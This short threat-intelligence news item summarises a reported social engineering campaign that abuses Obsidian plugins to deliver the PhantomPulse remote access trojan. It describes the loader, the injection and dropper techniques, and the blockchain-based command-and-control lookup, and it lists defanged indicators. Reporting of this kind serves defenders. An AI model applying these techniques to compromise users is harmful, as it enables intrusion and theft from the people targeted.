ACCORDING to Elastic Security Labs, a novel social engineering campaign tracked as REF6598 abuses Obsidian’s community plugin ecosystem to gain initial access, targeting financial and cryptocurrency sector individuals via LinkedIn and Telegram. The attackers weaponise Obsidian’s Shell Commands and Hider plugins to silently execute code once a victim opens a shared cloud vault, delivering a multi-stage chain that culminates in the PhantomPulse RAT.
On Windows, the chain uses an in-memory, AES-256-CBC loader delivery and module stomping for injection, while macOS employs an obfuscated AppleScript dropper with a Telegram fallback C2. The campaign utilises a blockchain-based C2 resolution mechanism, querying three Blockscout instances for on-chain transaction data from a hardcoded wallet to obtain the C2 URL, with a Cloudflare-proxied PhantomPulse panel as a fallback.
Observed infrastructure includes a staging server at 195.3.222[.]251, a PhantomPulse C2 domain at panel.fefea22134[.]net, and on-chain activity linked to wallet 0xc117688c530b660e15085bF3A2B664117d8672aA. Elastic Defend reportedly detected and blocked the attack at the early stage, preventing execution of the backdoor.